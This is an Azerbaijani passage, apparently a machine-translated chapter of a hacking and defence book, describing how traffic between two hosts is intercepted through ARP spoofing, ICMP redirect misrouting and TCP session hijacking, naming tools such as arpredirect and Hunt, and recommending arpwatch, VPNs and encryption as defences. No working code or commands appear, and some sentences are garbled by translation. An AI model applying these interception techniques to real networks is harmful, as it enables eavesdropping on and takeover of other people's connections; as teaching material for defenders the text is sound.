İki A və B hostları arasında şəbəkə qarşılıqlı əlaqəsi prosesini ələ keçirmək və ələ keçirmək üçün təcavüzkar A və B hostlarına saxta ARP (Ünvan Həlli Protokolu) mesajları göndərməklə qarşılıqlı əlaqədə olan hostların IP ünvanlarını öz IP ünvanı ilə əvəz edə bilər. Siz hostun İP ünvanının hostun şəbəkə kartına sərt kodlaşdırılmış maşın ünvanına (MAC ünvanına) həlli (çevirilməsi) prosedurunu təsvir edən Əlavə D-də ARP protokolu ilə tanış ola bilərsiniz. Gəlin görək haker A və B hostları arasında şəbəkə rabitəsini kəsmək üçün ARP-dən necə istifadə edə bilər.

Təcavüzkar, məsələn, W2RK paketindən nbtstat əmrindən istifadə edərək, A və B hostlarının MAC ünvanlarını müəyyən edir.

Təcavüzkar A və B hostlarının müəyyən edilmiş MAC ünvanlarına mesajlar göndərir ki, bu da hostların İP ünvanlarını kompüterlərin MAC ünvanlarına həll etmək sorğularına ARP tərəfindən saxtalaşdırılmış cavablardır. Host A-ya məlumat verilir ki, B hostunun IP ünvanı təcavüzkarın kompüterinin MAC ünvanına uyğundur; B hostuna məlumat verilir ki, A hostunun IP ünvanı həm də təcavüzkarın kompüterinin MAC ünvanına uyğundur.

A və B hostları qəbul edilmiş MAC ünvanlarını ARP keşlərində saxlayır və sonra onlardan bir-birinə mesaj göndərmək üçün istifadə edirlər. A və B IP ünvanları təcavüzkarın kompüterinin MAC ünvanına uyğun gəldiyindən, A və B hostları heç bir şübhə etmədən mesajları ilə hər şeyi edə bilən bir vasitəçi vasitəsilə əlaqə qurur.

Bu cür hücumlardan qorunmaq üçün şəbəkə administratorları şəbəkə kompüterlərinin MAC ünvanları və IP ünvanları arasında yazışmalar cədvəli olan verilənlər bazası saxlamalıdırlar. Sonra, xüsusi istifadə edərək proqram təminatı Məsələn, arpwatch utilitləri (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) şəbəkəni vaxtaşırı yoxlaya və uyğunsuzluqları müəyyən edə bilər.

UNIX şəbəkələrində bu tip saxtalaşdırılmış ARP sorğu hücumu arpredirect kimi şəbəkə trafikinin monitorinqi və idarə edilməsi üçün sistem utilitlərindən istifadə etməklə həyata keçirilə bilər. Təəssüf ki, belə etibarlı yardım proqramları Windows 2000/XP şəbəkələrində tətbiq olunmur. Məsələn, NTsecurity saytında (http://www.ntsecurity.nu) şəbəkə hostları arasında trafikin yönləndirilməsi üçün bir vasitə kimi təqdim olunan GrabitAII yardım proqramını yükləyə bilərsiniz. Bununla belə, GrabitAII yardım proqramının funksionallığının əsas yoxlanışı göstərir ki, onun funksiyalarının həyata keçirilməsində tam uğur hələ çox uzaqdadır.

Yanlış marşrutlaşdırma

Yanlış marşrutlaşdırma həyata keçirmək üçün təcavüzkar A hostunun yerləşdiyi lokal şəbəkənin təşkili haqqında bəzi təfərrüatları, xüsusən də A hostundan B-yə trafikin göndərildiyi marşrutlaşdırıcının IP ünvanını bilməlidir. Bunu bilən təcavüzkar IP dataqramı yaradacaq ki, burada IP-göndərən ünvan marşrutlaşdırıcının IP ünvanı kimi müəyyən edilir və alıcı A hostudur. Həmçinin dataqrama yeni marşrutlaşdırıcının ünvan sahəsi ilə ICMP Yönləndirmə mesajı daxil edilir. Təcavüzkarın kompüterinin IP ünvanı. Belə bir mesajı alan A hostu bütün mesajları təcavüzkarın kompüterinin IP ünvanına göndərəcək.

Yuxarıdakı ələ keçirmə nümunələri (təcavüzkarların imkanları məhdud deyil) məlumatlarda məxfi məlumat varsa, şəbəkə üzərindən ötürülən məlumatların qorunmasının zəruriliyinə inandırır. Şəbəkə trafikinin tutulmasından qorunmağın yeganə üsulu kriptoqrafik alqoritmləri və şifrələmə protokollarını həyata keçirən və məxfi məlumatların açıqlanmasının və dəyişdirilməsinin qarşısını alan proqramların istifadəsidir. Bu cür problemləri həll etmək üçün kriptoqrafiya təhlükəsiz protokollar üzərindən ötürülən mesajların şifrlənməsi, imzalanması və həqiqiliyini yoxlamaq üçün alətlər təqdim edir.

4-cü Fəsildə təsvir edilən məlumat mübadiləsini qorumaq üçün bütün kriptoqrafik metodların praktiki tətbiqi VPN (Virtual Şəxsi Şəbəkə) şəbəkələri tərəfindən təmin edilir. Kriptoqrafik təhlükəsizlik prinsipləri və texnikalarının qısa icmalı ilə Əlavə E-də tanış olmaq olar Ətraflı Təsviri PGP Desktop Security proqramı (http://www.pgp.com) tərəfindən təmin edilən kriptoqrafik mühafizə vasitələri.

TCP bağlantısının kəsilməsi

TCP bağlantısını qaçırma hücumlarını həyata keçirmək üçün bir neçə effektiv utilitlər yaradılmışdır, lakin onların hamısı Unix platforması üçün həyata keçirilir və veb saytlarda bu yardım proqramları yalnız mənbə kodu şəklində təqdim olunur. Beləliklə, hakerliyin nəcib səbəbinə inanan praktiklər olaraq, TCP bağlantısının qarşısının alınması metodundan istifadə edən hücumlar bizim üçün çox faydalı deyil. (Başqalarının proqram kodunu başa düşmək istəyənlər http://www.cri.cz/~kra/index.html saytına müraciət edə bilərlər, buradan yükləyə bilərsiniz. mənbə Pavel Krauz-dan tanınmış Hunt TCP əlaqə ələ keçirmə proqramı).

Praktiki vasitələrin olmamasına baxmayaraq, TCP əlaqələrinin qarşısının alınması kimi maraqlı mövzunu nəzərdən qaçıra bilmərik və bu cür hücumların bəzi aspektləri üzərində dayanacağıq. TCP paketinin strukturu və TCP əlaqələrinin qurulması proseduru haqqında bəzi məlumatlar bu kitabın D Əlavəsində verilmişdir, lakin burada diqqətimizi bir suala yönəldəcəyik - hakerlərə TCP bağlantısını ələ keçirmə hücumlarını həyata keçirməyə tam olaraq nə imkan verir? Gəlin bu mövzunu daha ətraflı nəzərdən keçirək, əsasən vədakı müzakirələrə əsaslanaq.

TCP protokolu (Transmission Control Protocol) virtual rabitə kanalı üzərində məntiqi əlaqələr yaratmağa imkan verən əsas OSI nəqliyyat səviyyəsi protokollarından biridir. Bu kanal üzərindən paketlər onların ardıcıllığı qeydə alınmaqla ötürülür və qəbul edilir, paketlərin hərəkətinə nəzarət edilir, təhrif olunmuş paketlərin təkrar ötürülməsi təşkil edilir və sessiyanın sonunda rabitə kanalı qırılır. TCP protokolu TCP/IP ailəsində təkmil mesaj identifikasiyası və əlaqə sisteminə malik yeganə əsas protokoldur.

TCP paketini identifikasiya etmək üçün TCP başlığında iki 32 bitlik identifikator var ki, onlar da sıra nömrəsi və təsdiq nömrəsi adlanan paket sayğacları kimi çıxış edir. TCP paketinin nəzarət bitləri adlanan daha bir sahəsi ilə də maraqlanacağıq. Bu 6 bitlik sahəyə aşağıdakı nəzarət bitləri daxildir (soldan sağa sıra ilə):

URG - təcili bayraq;

ACK - təsdiqləmə bayrağı;

PSH - daşımaq bayrağı;

RST - əlaqənin yenidən qurulması bayrağı;

SYN - sinxronizasiya bayrağı;

FIN - əlaqənin dayandırılması bayrağı.

TCP bağlantısı yaratmaq proseduruna baxaq.

1. Əgər A hostunun B hostu ilə TCP bağlantısı yaratması lazımdırsa, onda A hostu B hostuna aşağıdakı mesajı göndərir:

A -> B: SYN, ISSa

Bu o deməkdir ki, A hostu tərəfindən göndərilən mesajda SYN bayrağı (Sinxronizasiya ardıcıllığı nömrəsi) var və ardıcıllıq nömrəsi sahəsi ilkin 32 bitlik dəyər ISSa (İlkin Sıra Nömrəsi) təyin olunub.

2. A hostundan alınan sorğuya cavab olaraq B hostu SYN bitinin və ACK bitinin təyin olunduğu mesajla cavab verir. Sıra nömrəsi sahəsində host B ilkin sayğac dəyərini təyin edir - ISSb; təsdiq nömrəsi sahəsində daha sonra A hostundan birinci paketdə alınan ISSa dəyəri bir artırılacaq. Beləliklə, host B bu mesajla cavab verir:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Nəhayət, A hostu B hostuna mesaj göndərir, burada: ACK biti təyin edilir; ardıcıllıq nömrəsi sahəsində ISSa + 1 dəyəri var; Təsdiq nömrəsi sahəsində ISSb + 1 dəyəri var. Bundan sonra A və B hostları arasında TCP bağlantısı qurulmuş hesab olunur:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. İndi A hostu yeni yaradılmış virtual TCP kanalı üzərindən B hostuna məlumat paketləri göndərə bilər:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA

Burada DATA məlumat deməkdir.

Yuxarıda müzakirə edilən TCP əlaqəsinin yaradılması alqoritmindən görmək olar ki, TCP abunəçilərinin və TCP bağlantısının yeganə identifikatorları ardıcıllıq nömrəsinin və təsdiq nömrəsinin iki 32 bitlik parametrləridir - ISSa və ISSb. Buna görə də, əgər haker ISSa və ISSb sahələrinin cari dəyərlərini öyrənə bilsə, onda heç bir şey ona saxtalaşdırılmış TCP paketi yaratmağa mane olmayacaq. Bu o deməkdir ki, haker yalnız verilmiş TCP bağlantısı üçün TCP paketinin ISSa və ISSb parametrlərinin cari dəyərlərini seçməli, paketi bu TCP bağlantısının müştərisi adından istənilən İnternet hostundan və bu paketdən göndərməlidir. doğru kimi qəbul ediləcək!

Belə TCP paket saxtakarlığının təhlükəsi həm də ona görə vacibdir ki, yüksək səviyyəli FTP və TELNET protokolları TCP protokolu əsasında həyata keçirilir və FTP və TELNET paket müştərilərinin identifikasiyası tamamilə TCP protokoluna əsaslanır.

Bundan əlavə, FTP və TELNET protokolları mesaj göndərənlərin İP ünvanlarını yoxlamadığından, saxtalaşdırılmış paketi aldıqdan sonra FTP və ya TELNET serverləri yalançı paketdə göstərilən haker hostunun İP ünvanına cavab mesajı göndərəcəklər. Bundan sonra haker host öz IP ünvanından FTP və ya TELNET serveri ilə işləməyə başlayacaq, lakin qanuni olaraq qoşulmuş istifadəçinin hüquqları ilə, o da öz növbəsində sayğacların uyğunsuzluğu səbəbindən serverlə əlaqəni itirəcək.

Beləliklə, yuxarıda təsvir edilən hücumu həyata keçirmək üçün zəruri və kifayət qədər şərt TCP bağlantısını müəyyən edən iki cari 32 bitlik ISSa və ISSb parametrləri haqqında bilikdir. Gəlin nəzərdən keçirək mümkün yollar onları qəbul etmək. Haker hostu hücuma məruz qalan şəbəkə seqmentinə qoşulduqda, ISSa və ISSb dəyərlərini əldə etmək vəzifəsi əhəmiyyətsizdir və şəbəkə trafikini təhlil etməklə həll edilə bilər. Buna görə də aydın şəkildə başa düşmək lazımdır ki, TCP protokolu, prinsipcə, əlaqəni yalnız təcavüzkarın ötürülən mesajları ələ keçirməsi mümkün olmadıqda qorumağa imkan verir. bu əlaqə, yəni yalnız haker hostu TCP bağlantısının abunəçi seqmentindən fərqli şəbəkə seqmentinə qoşulduqda.

Buna görə də, hücumçu və onun hədəfi müxtəlif şəbəkə seqmentlərində olduqda, seqmentarası hücumlar haker üçün ən çox maraq doğurur. Bu vəziyyətdə, ISSa və ISSb dəyərlərini əldə etmək vəzifəsi əhəmiyyətsiz deyil. Bu problemi həll etmək üçün indi yalnız iki üsul icad edilmişdir.

ISSa və ISSb-nin əvvəlki qiymətlərinin ekstrapolyasiyası ilə TCP əlaqə parametrlərinin ilkin dəyərinin riyazi proqnozu.

Unix rsh serverlərində TCP bağlantısı abunəçilərinin müəyyən edilməsində zəifliklərdən istifadə.

Birinci vəzifə müxtəlif TCP protokolunun həyata keçirilməsinin dərin tədqiqatları ilə həll olunur əməliyyat sistemləri indi isə sırf nəzəri əhəmiyyətə malikdir. İkinci problem zəifliklərdən istifadə etməklə həll edilir Unix sistemləri etibarlı hostları müəyyən etməklə. (Verilmiş hosta münasibətdə etibarlı A, istifadəçisi A hostunun r-xidmətindən istifadə edərək autentifikasiya olmadan A hostuna qoşula bilən şəbəkə host B-dir). TCP paketlərinin parametrləri ilə manipulyasiya etməklə, haker etibarlı hostu təqlid etməyə və hücuma məruz qalan hostla TCP bağlantısını kəsməyə cəhd edə bilər.

Bütün bunlar çox maraqlıdır, lakin bu cür tədqiqatların praktiki nəticələri hələ görünmür. Buna görə də, bu mövzunu daha dərindən araşdırmaq istəyən hər kəsə yuxarıda təqdim olunan məlumatların əsasən alındığı kitaba müraciət etməyi tövsiyə edirik.

Nəticə

Şəbəkə məlumatlarının ələ keçirilməsi şəbəkənin sındırılmasının ən təsirli üsuludur və hakerə şəbəkədə dolaşan demək olar ki, bütün məlumatları əldə etməyə imkan verir. Ən böyük praktik inkişaf iyləmə alətləri ilə əldə edilmişdir, yəni. şəbəkələrə qulaq asmaq; Bununla belə, trafiki haker hostuna yönləndirmək üçün şəbəkənin normal fəaliyyətinə müdaxilə etməklə həyata keçirilən şəbəkə məlumatlarının tutulması üsullarını, xüsusən də TCP əlaqələrini ələ keçirmə üsullarını nəzərdən qaçıra bilmərik. Bununla belə, praktikada sonuncu qeyd olunan üsullar hələ kifayət qədər inkişaf etməmişdir və təkmilləşdirilməlidir.

Anti-haker bilməlidir ki, məlumatların tutulmasından yeganə xilas onun şifrələnməsidir, yəni. kriptoqrafik mühafizə üsulları. Şəbəkə üzərindən mesaj göndərərkən, şəbəkənin kabel sisteminin tamamilə həssas olduğunu və şəbəkəyə qoşulmuş istənilən hakerin ondan ötürülən bütün gizli mesajları tuta biləcəyini əvvəlcədən düşünməlisiniz. Bu problemi həll etmək üçün iki texnologiya var - VPN şəbəkəsi yaratmaq və mesajların özlərini şifrələmək. Bütün bu vəzifələri PGP Desktop Security proqram paketindən istifadə edərək həll etmək çox asandır (onun təsvirini, məsələn, burada tapa bilərsiniz).

Kateqoriyada məşhur: